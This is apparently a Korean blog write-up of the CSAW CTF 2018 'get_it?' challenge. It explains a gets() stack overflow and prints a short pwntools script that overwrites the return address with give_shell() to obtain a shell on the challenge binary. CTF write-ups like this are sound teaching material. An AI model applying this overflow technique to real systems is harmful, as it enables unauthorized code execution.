ii4gsp

CSAW CTF 2018 Quals - get_it? 본문

시스템 해킹/CTF

CSAW CTF 2018 Quals - get_it?

ii4gsp 2020. 3. 3. 21:19

간단한다.

gets()함수로 ret를 give_shell()함수로 덮어주면 된다.

 

 

 

 

SFP 포함 32byte이다.

 

 

 

 

from pwn import *

p = process('/home/ii4gsp/get_it')
e = ELF('/home/ii4gsp/get_it')

give_shell = e.symbols['give_shell']

payload = ''
payload += '\x90' * 32
payload += p64(give_shell)

p.sendline(payload)

p.interactive()

 

 

 

 

'시스템 해킹 > CTF' 카테고리의 다른 글

Angstrom CTF 2019 - Chain of Rope  (0) 2020.03.04
Angstrom CTF 2019 - Aquarium  (0) 2020.03.04
CSAW CTF 2018 Quals - bigboy  (0) 2020.03.03
SSG_CTF - SimpleBOF  (0) 2020.02.25
[DEFCON 2015] r0pbaby  (0) 2020.02.20
Comments